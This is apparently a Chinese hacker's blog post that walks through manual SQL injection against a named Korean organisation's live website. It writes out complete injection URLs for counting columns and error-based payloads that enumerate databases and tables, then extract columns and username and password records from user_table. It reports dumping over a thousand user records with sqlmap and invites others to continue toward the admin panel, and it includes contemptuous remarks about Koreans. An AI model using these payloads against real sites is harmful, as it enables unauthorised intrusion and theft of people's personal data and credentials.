注入点很多,随便找了一个:
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593
查看列长度:
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 order by 74
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 order by 75
74时正确,75时错误,所以列长度为74,下面进行暴库试试。。。。
http://www.awm.or.kr/bbs/view.php?board=document&nid=43615 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74
出错了,但是语句没问题。。。卧槽。。。。换几条语句总是出错!!!!!
下面换些nb的语句,忘了跟哪收集的了,不足之处就是库,表名、字段、字段内容需要一个一个的爆!!!!不多说,看操作!!!
暴库:
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
不断修改语句中“information_schema.schemata”后面第一个“limit”后0开始的值,直到出现正确页面为止,如图,0时爆出库 information_schema,
1 PSSP
2 PSSP2013
3 test
到4时出现正确页面,所以
1 PSSP
2 PSSP2013
3 test
爆当前库:
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
将得到的数字加上0x转码,如下图:
得到当前库为PSSP2013
爆表:
得到了库,下面开始爆库下面的表,需要一个一个的爆。。。。
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,hex(cast(table_name as char)),0x27,0x7e) from information_schema.tables where table_schema=0x5053535032303133 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
这是一个漫长的过程,,我对棒子国的思想完全蒙圈了。,,,爆出了155个表,最终爆出了user_table表,这个表恰好是在第155个最后出现的。。。。所以手工注入需要有耐心啊。。。。
(依次爆表的方法与爆库方法一样)
10_group_member_table 10_group_member_field_table 15_group_member_field_table 15_group_member_table
19_group_member_field_table 19_group_member_table 23_group_member_field_table 23_group_member_table
27_group_member_field_table 27_group_member_table 28_group_member_field_table
28_group_member_table 29_group_member_field_table 29_group_member_table
2_group_member_field_table 2_group_member_table 9_group_member_field_table 9_group_member_table
board_Terms board_Terms2Post board_trackback category_info_table cms_section cms_section_data
dir_config_info gmail_config_info group_blog_table group_field_table group_info_table group_level_table group_user_table jcalendar_board jcalendar_comment_memo jcalendar_config_info
jcalendar_pepaclcal_board join_config_info join_out_config_info login_config_info maybbs_align
maybbs_antigizi_board maybbs_art_board maybbs_awmnotice_board maybbs_board maybbs_board_board
maybbs_comment_memo maybbs_config_info maybbs_document_board maybbs_eco_board maybbs_editor_board
maybbs_executive_board maybbs_executive_doc_board maybbs_g20_board maybbs_gjboard_board
maybbs_gjnews_board maybbs_gjnotice_board maybbs_gjpaper_board maybbs_gjstate_board maybbs_health_board maybbs_healthnotice_board
menu_table
155 user_table 153 user_blog_table 155个表
就这些破逼玩意。。。还有一半没贴出来。。。。脑子怎么想的。。fuck!!!!!
暴字段:
爆出了表,下面就开始暴字段了。。。方法依旧:
表user_table
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 and(select 1 from(select count(*),concat((select (select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x5053535032303133 and table_name=0x757365725F7461626C65 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
贴出几张爆出来的字段:
一共有36个字段,全是一些job Email phone name id address之类的信息。。。。
暴字段内容:
还是手工吧,不知道有多少。。。。
http://www.awm.or.kr/bbs/view.php?board=report&nid=43593 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,user_table.username,0x27,0x7e,user_table.password,0x27,0x7e,user_table.is_new_passwd,0x27,0x7e) from user_table limit 10,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
先看一下效果:
确实有数剧,粗略看看有多少:
卧槽。。。一千多条。。。手工要搞到毛时候、、、、果断放弃。。。
此时,sqlmap起作用了,***最真实的利器!!!
结果:
裤子给丫脱了。。到此结束
总结:搞完发现被搞晕了。。。貌似我要搞的不是这些东西,而是后台。。。扫扫后台也没找到。。。。有没有大牛能继续下去